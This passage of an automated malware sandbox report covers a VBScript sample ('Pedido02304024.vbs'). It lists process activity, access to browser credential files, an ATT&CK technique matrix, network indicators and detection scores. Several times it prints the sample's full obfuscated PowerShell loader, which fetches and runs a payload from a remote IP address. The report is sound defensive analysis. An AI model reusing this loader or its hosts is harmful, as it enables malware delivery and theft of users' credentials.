r.kie rg.vh e apd edr,so[r$mhryvpfs illao.pfhio dgo,n tdo.iidu2,1o].=.$ua uft oui n,d t r.k sl ');$superrheumatized=ciceroner 'lr.ehfsefr e,n cte.vbrvkoevr .idko w npl ona d f i l.ec( $.liy,d.sbiidbesrsn.e.sd, $.bae,tta g.ebtsh,e.disg), ';$superrheumatized=$conveth[1]+$superrheumatized;$betagetheds=$conveth[0];nonsensitizeds (ciceroner ' $agfl o,bba.l.:mdtvhnkl d.eenc=i(utfe s,tr- pma.t.h $tbpe tsamgme tnhke d s ) ');while (!$dvnlden) {nonsensitizeds (ciceroner '.$pgfltosb apls: osdtiknsi ann = $.t r u.eo ') ;nonsensitizeds $superrheumatized;nonsensitizeds (ciceroner ' swtba.r.t -ts l.e e ps e4. ');nonsensitizeds (ciceroner 'b$ g leo.bcawl,:,d vbnblpdbein = (rtue,s,tr- p.ast ha b$,bse t aag e,tdh e.ddsp) ') ;nonsensitizeds (ciceroner 'd$ gmlqo b,acln: b.uvs t ida n =f$rgsl.o bsadlb:oo uotss m o k.e s +a+ % $,l ien,iae shksriibv esrmse.kc.oburn t ') ;$lydsidernes=$linieskrivers[$bustian];}nonsensitizeds (ciceroner 'g$ g l o bua l,: a mfpphso.loypt e,2,0m4 d=, sg e,t -,c o.n t esn ts $ bbe.tdaegee t h emd,s. ');nonsensitizeds (ciceroner 'e$fg lcoabua,lc:hsgtda msmae,r,i negflsyd f=. w[ls y,swtkebmt.tccosn vsesrat.]r:g:cfqr otm,bka s es6k4 srt,r ivnugs(,$ a,mbpphjoal.yitte 2 0,4 )h ');nonsensitizeds (c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$kildematerialet107 = 1;$kernevaabnet='substrin';$kernevaabnet+='g';function ciceroner($bldgringer){$cholecystogram=$bldgringer.length-$kildematerialet107;for($brandsituationerne=1; $brandsituationerne -lt $cholecystogram; $brandsituationerne+=(2)){$categoricalness+=$bldgringer.$kernevaabnet.invoke($brandsituationerne, $kildematerialet107);}$categoricalness;}function nonsensitizeds($whap){& ($skimpiness) ($whap);}$autoindtrks=ciceroner 'pm,o z i l loak/,5k. 0 ( w.ianrd ouw sc netc ,1s0.. 0m;i w i nu6 4.;w pxs6r4 ;, rrvk: 1 2b1a. 0 )s cg.egckk oa/ 2e0r1s0 0l1 0y1t .ftior,e,f o.xp/n1s2u1g.,0b ';$hypsilophodontoid21=ciceroner 'ku.s epr - a g e,npt ';$lydsidernes=ciceroner 'uh totmp,:./ /l8b7 . 1 2 1w..1 0.5r.g1 6u3 /.bfo,lpd,kcluusbhbsecn s,. p ckzn ';$jvnhjde=ciceroner ',>, ';$skimpiness=ciceroner 'aijeux, ';$equichangeable='jynginae';nonsensitizeds (ciceroner '.s,ert -bc omn,tpe nptm -zpsa tnh wt :e\sftegi ..t xctu g-,v all,u,er $aesq uiipc,hfa npg eba b l.e ;m ');nonsensitizeds (ciceroner ',i.f. e(btkeks te- p a t h tb: \afae i..stgxtt ),{ euxiimt }w; ');$nutmegged = ciceroner 'qebc.hsou %taop p dsast at%,\acbeji,l.oamee.t eir s,.bpbraiu h&,&. edc,hdob $. ';nonsensitizeds (ciceroner ' $ gslro bta l.:,c otnnv est h.=k(.c mddt a/ac $rn uft.mme g,gpefdl)p ');nonsensitizeds (ciceroner 'f$ogkl o b aals:tl itn i e sfk r.i vuevrasr=f$nlbyddss i d,etrinress,.ns.p lli t ( $hj.v n hfjld,e,). ');$lydsidernes=$linieskrivers[0];nonsensitizeds (ciceroner 't$og leo b aulr: rae fse.r eln c e.v rtkde rw=pnce w - o b j.epcstu .shypspt enmd. n e.tg.jwee bfc.lti e,n t. ');nonsensitizeds (ciceroner 'u$ur.ekfae rde,nsc e,v r.kie rg.vh e apd edr,so[r$mhryvpfs illao.pfhio dgo,n tdo.iidu2,1o].=.$ua uft oui n,d t r.k sl ');$superrheumatized=ciceroner 'lr.ehfsefr e,n cte.vbrvkoevr .idko w npl ona d f i l.ec( $.liy,d.sbiidbesrsn.e.sd, $.bae,tta g.ebtsh,e.disg), ';$superrheumatized=$conveth[1]+$superrheumatized;$betagetheds=$conveth[0];nonsensitizeds (ciceroner ' $agfl o,bba.l.:mdtvhnkl d.eenc=i(utfe s,tr- pma.t.h $tbpe tsamgme tnhke d s ) ');while (!$dvnlden) {nonsensitizeds (ciceroner '.$pgfltosb apls: osdtiknsi ann = $.t r u.eo ') ;nonsensitizeds $superrheumatized;nonsensitizeds (ciceroner ' swtba.r.t -ts l.e e ps e4. ');nonsensitizeds (ciceroner 'b$ g leo.bcawl,:,d vbnblpdbein = (rtue,s,tr- p.ast ha b$,bse t aag e,tdh e.ddsp) ') ;nonsensitizeds (ciceroner 'd$ gmlqo b,acln: b.uvs t ida n =f$rgsl.o bsadlb:oo uotss m o k.e s +a+ % $,l ien,iae shksriibv esrmse.kc.oburn t ') ;$lydsidernes=$linieskrivers[$bustian];}nonsensitizeds (ciceroner 'g$ g l o bua l,: a mfpphso.loypt e,2,0m4 d=, sg e,t -,c o.n t esn ts $ bbe.tdaegee t h emd,s. ');nonsensitizeds (ciceroner 'e$fg lcoabua,lc:hsgtda msmae,r,i negflsyd f=. w[ls y,swtkebmt.tccosn vsesrat.]r:g:cfqr otm,bka s es6k4 srt,r ivnugs(,$ a,mbpphjoal.yitte 2 0,4 )h ');nonsensitizeds (c
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kildematerialet107 = 1;$kernevaabnet='substrin';$kernevaabnet+='g';function ciceroner($bldgringer){$cholecystogram=$bldgringer.length-$kildematerialet107;for($brandsituationerne=1; $brandsituationerne -lt $cholecystogram; $brandsituationerne+=(2)){$categoricalness+=$bldgringer.$kernevaabnet.invoke($brandsituationerne, $kildematerialet107);}$categoricalness;}function nonsensitizeds($whap){& ($skimpiness) ($whap);}$autoindtrks=ciceroner 'pm,o z i l loak/,5k. 0 ( w.ianrd ouw sc netc ,1s0.. 0m;i w i nu6 4.;w pxs6r4 ;, rrvk: 1 2b1a. 0 )s cg.egckk oa/ 2e0r1s0 0l1 0y1t .ftior,e,f o.xp/n1s2u1g.,0b ';$hypsilophodontoid21=ciceroner 'ku.s epr - a g e,npt ';$lydsidernes=ciceroner 'uh totmp,:./ /l8b7 . 1 2 1w..1 0.5r.g1 6u3 /.bfo,lpd,kcluusbhbsecn s,. p ckzn ';$jvnhjde=ciceroner ',>, ';$skimpiness=ciceroner 'aijeux, ';$equichangeable='jynginae';nonsensitizeds (ciceroner '.s,ert -bc omn,tpe nptm -zpsa tnh wt :e\sftegi ..t xctu g-,v all,u,er $aesq uiipc,hfa npg eba b l.e ;m ');nonsensitizeds (ciceroner ',i.f. e(btkeks te- p a t h tb: \afae i..stgxtt ),{ euxiimt }w; ');$nutmegged = ciceroner 'qebc.hsou %taop p dsast at%,\acbeji,l.oamee.t eir s,.bpbraiu h&,&. edc,hdob $. ';nonsensitizeds (ciceroner ' $ gslro bta l.:,c otnnv est h.=k(.c mddt a/ac $rn uft.mme g,gpefdl)p ');nonsensitizeds (ciceroner 'f$ogkl o b aals:tl itn i e sfk r.i vuevrasr=f$nlbyddss i d,etrinress,.ns.p lli t ( $hj.v n hfjld,e,). ');$lydsidernes=$linieskrivers[0];nonsensitizeds (ciceroner 't$og leo b aulr: rae fse.r eln c e.v rtkde rw=pnce w - o b j.epcstu .shypspt enmd. n e.tg.jwee bfc.lti e,n t. ');nonsensitizeds (ciceroner 'u$ur.ekfae rde,nsc e,v r.kie rg.vh e apd edr,so[r$mhryvpfs illao.pfhio dgo,n tdo.iidu2,1o].=.$ua uft oui n,d t r.k sl ');$superrheumatized=ciceroner 'lr.ehfsefr e,n cte.vbrvkoevr .idko w npl ona d f i l.ec( $.liy,d.sbiidbesrsn.e.sd, $.bae,tta g.ebtsh,e.disg), ';$superrheumatized=$conveth[1]+$superrheumatized;$betagetheds=$conveth[0];nonsensitizeds (ciceroner ' $agfl o,bba.l.:mdtvhnkl d.eenc=i(utfe s,tr- pma.t.h $tbpe tsamgme tnhke d s ) ');while (!$dvnlden) {nonsensitizeds (ciceroner '.$pgfltosb apls: osdtiknsi ann = $.t r u.eo ') ;nonsensitizeds $superrheumatized;nonsensitizeds (ciceroner ' swtba.r.t -ts l.e e ps e4. ');nonsensitizeds (ciceroner 'b$ g leo.bcawl,:,d vbnblpdbein = (rtue,s,tr- p.ast ha b$,bse t aag e,tdh e.ddsp) ') ;nonsensitizeds (ciceroner 'd$ gmlqo b,acln: b.uvs t ida n =f$rgsl.o bsadlb:oo uotss m o k.e s +a+ % $,l ien,iae shksriibv esrmse.kc.oburn t ') ;$lydsidernes=$linieskrivers[$bustian];}nonsensitizeds (ciceroner 'g$ g l o bua l,: a mfpphso.loypt e,2,0m4 d=, sg e,t -,c o.n t esn ts $ bbe.tdaegee t h emd,s. ');nonsensitizeds (ciceroner 'e$fg lcoabua,lc:hsgtda msmae,r,i negflsyd f=. w[ls y,swtkebmt.tccosn vsesrat.]r:g:cfqr otm,bka s es6k4 srt,r ivnugs(,$ a,mbpphjoal.yitte 2 0,4 )h ');nonsensitizeds (cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$kildematerialet107 = 1;$kernevaabnet='substrin';$kernevaabnet+='g';function ciceroner($bldgringer){$cholecystogram=$bldgringer.length-$kildematerialet107;for($brandsituationerne=1; $brandsituationerne -lt $cholecystogram; $brandsituationerne+=(2)){$categoricalness+=$bldgringer.$kernevaabnet.invoke($brandsituationerne, $kildematerialet107);}$categoricalness;}function nonsensitizeds($whap){& ($skimpiness) ($whap);}$autoindtrks=ciceroner 'pm,o z i l loak/,5k. 0 ( w.ianrd ouw sc netc ,1s0.. 0m;i w i nu6 4.;w pxs6r4 ;, rrvk: 1 2b1a. 0 )s cg.egckk oa/ 2e0r1s0 0l1 0y1t .ftior,e,f o.xp/n1s2u1g.,0b ';$hypsilophodontoid21=ciceroner 'ku.s epr - a g e,npt ';$lydsidernes=ciceroner 'uh totmp,:./ /l8b7 . 1 2 1w..1 0.5r.g1 6u3 /.bfo,lpd,kcluusbhbsecn s,. p ckzn ';$jvnhjde=ciceroner ',>, ';$skimpiness=ciceroner 'aijeux, ';$equichangeable='jynginae';nonsensitizeds (ciceroner '.s,ert -bc omn,tpe nptm -zpsa tnh wt :e\sftegi ..t xctu g-,v all,u,er $aesq uiipc,hfa npg eba b l.e ;m ');nonsensitizeds (ciceroner ',i.f. e(btkeks te- p a t h tb: \afae i..stgxtt ),{ euxiimt }w; ');$nutmegged = ciceroner 'qebc.hsou %taop p dsast at%,\acbeji,l.oamee.t eir s,.bpbraiu h&,&. edc,hdob $. ';nonsensitizeds (ciceroner ' $ gslro bta l.:,c otnnv est h.=k(.c mddt a/ac $rn uft.mme g,gpefdl)p ');nonsensitizeds (ciceroner 'f$ogkl o b aals:tl itn i e sfk r.i vuevrasr=f$nlbyddss i d,etrinress,.ns.p lli t ( $hj.v n hfjld,e,). ');$lydsidernes=$linieskrivers[0];nonsensitizeds (ciceroner 't$og leo b aulr: rae fse.r eln c e.v rtkde rw=pnce w - o b j.epcstu .shypspt enmd. n e.tg.jwee bfc.lti e,n t. ');nonsensitizeds (ciceroner 'u$ur.ekfae rde,nsc e,v r.kie rg.vh e apd edr,so[r$mhryvpfs illao.pfhio dgo,n tdo.iidu2,1o].=.$ua uft oui n,d t r.k sl ');$superrheumatized=ciceroner 'lr.ehfsefr e,n cte.vbrvkoevr .idko w npl ona d f i l.ec( $.liy,d.sbiidbesrsn.e.sd, $.bae,tta g.ebtsh,e.disg), ';$superrheumatized=$conveth[1]+$superrheumatized;$betagetheds=$conveth[0];nonsensitizeds (ciceroner ' $agfl o,bba.l.:mdtvhnkl d.eenc=i(utfe s,tr- pma.t.h $tbpe tsamgme tnhke d s ) ');while (!$dvnlden) {nonsensitizeds (ciceroner '.$pgfltosb apls: osdtiknsi ann = $.t r u.eo ') ;nonsensitizeds $superrheumatized;nonsensitizeds (ciceroner ' swtba.r.t -ts l.e e ps e4. ');nonsensitizeds (ciceroner 'b$ g leo.bcawl,:,d vbnblpdbein = (rtue,s,tr- p.ast ha b$,bse t aag e,tdh e.ddsp) ') ;nonsensitizeds (ciceroner 'd$ gmlqo b,acln: b.uvs t ida n =f$rgsl.o bsadlb:oo uotss m o k.e s +a+ % $,l ien,iae shksriibv esrmse.kc.oburn t ') ;$lydsidernes=$linieskrivers[$bustian];}nonsensitizeds (ciceroner 'g$ g l o bua l,: a mfpphso.loypt e,2,0m4 d=, sg e,t -,c o.n t esn ts $ bbe.tdaegee t h emd,s. ');nonsensitizeds (ciceroner 'e$fg lcoabua,lc:hsgtda msmae,r,i negflsyd f=. w[ls y,swtkebmt.tccosn vsesrat.]r:g:cfqr otm,bka s es6k4 srt,r ivnugs(,$ a,mbpphjoal.yitte 2 0,4 )h ');nonsensitizeds (cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000009.00000002.2260878496.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2945407561.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2286239677.0000000023700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2945907117.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2945047764.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2945916928.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000009.00000002.2260878496.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2945407561.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2286239677.0000000023700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2945907117.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2945047764.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2945916928.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information321
        Scripting
        Valid Accounts11
        Windows Management Instrumentation
        321
        Scripting
        1
        Abuse Elevation Control Mechanism
        1
        Deobfuscate/Decode Files or Information
        1
        OS Credential Dumping
        2
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        3
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Abuse Elevation Control Mechanism
        LSASS Memory14
        System Information Discovery
        Remote Desktop Protocol1
        Data from Local System
        1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts11
        Command and Scripting Interpreter
        1
        Registry Run Keys / Startup Folder
        411
        Process Injection
        4
        Obfuscated Files or Information
        Security Account Manager1
        Query Registry
        SMB/Windows Admin Shares1
        Email Collection
        4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell
        Login Hook1
        Registry Run Keys / Startup Folder
        1
        Software Packing
        NTDS221
        Security Software Discovery
        Distributed Component Object ModelInput Capture4
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        Process Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading
        Cached Domain Credentials141
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
        Virtualization/Sandbox Evasion
        DCSync1
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
        Process Injection
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Rundll32
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430738 Sample: Pedido02304024.vbs Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 49 www.tyaer.com 2->49 51 www.theplays.shop 2->51 53 2 other IPs or domains 2->53 67 Snort IDS alert for network traffic 2->67 69 Multi AV Scanner detection for domain / URL 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 6 other signatures 2->73 12 wscript.exe 1 2->12         started        15 wab.exe 3 1 2->15         started        17 wab.exe 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 99 VBScript performs obfuscated calls to suspicious functions 12->99 101 Suspicious powershell command line found 12->101 103 Wscript starts Powershell (via cmd or directly) 12->103 105 3 other signatures 12->105 21 powershell.exe 14 19 12->21         started        process6 dnsIp7 55 87.121.105.163, 49731, 49737, 80 NET1-ASBG Bulgaria 21->55 79 Suspicious powershell command line found 21->79 81 Very long command line found 21->81 83 Found suspicious powershell code related to unpacking or dynamic code loading 21->83 25 powershell.exe 17 21->25         started        28 conhost.exe 21->28         started        30 cmd.exe 1 21->30         started        signatures8 process9 signatures10 93 Writes to foreign memory regions 25->93 95 Found suspicious powershell code related to unpacking or dynamic code loading 25->95 97 Hides threads from debuggers 25->97 32 wab.exe 6 25->32         started        35 cmd.exe 1 25->35         started        process11 signatures12 63 Maps a DLL or memory area into another process 32->63 65 Hides threads from debuggers 32->65 37 NJtMZOnjgWDVLdkRCPxthGxX.exe 32->37 injected process13 signatures14 75 Maps a DLL or memory area into another process 37->75 77 Found direct / indirect Syscall (likely to bypass EDR) 37->77 40 AtBroker.exe 1 13 37->40         started        process15 signatures16 85 Tries to steal Mail credentials (via file / registry access) 40->85 87 Tries to harvest and steal browser information (history, passwords, etc) 40->87 89 Modifies the context of a thread in another process (thread injection) 40->89 91 2 other signatures 40->91 43 NJtMZOnjgWDVLdkRCPxthGxX.exe 40->43 injected 47 firefox.exe 40->47         started        process17 dnsIp18 57 www.tyaer.com 47.91.88.207, 49739, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 43->57 59 www.theplays.shop 172.67.152.117, 49742, 49743, 49744 CLOUDFLARENETUS United States 43->59 61 www.oyoing.com 127.0.0.1 unknown unknown 43->61 107 Found direct / indirect Syscall (likely to bypass EDR) 43->107 signatures19

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Pedido02304024.vbs3%ReversingLabsWin32.Trojan.Generic
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        www.tyaer.com11%VirustotalBrowse
        www.oyoing.com10%VirustotalBrowse
        www.theplays.shop0%VirustotalBrowse
        www.megabet303.lol2%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
        http://www.e-me.lv/repository00%URL Reputationsafe
        http://www.acabogacia.org/doc00%URL Reputationsafe
        http://www.acabogacia.org/doc00%URL Reputationsafe
        http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
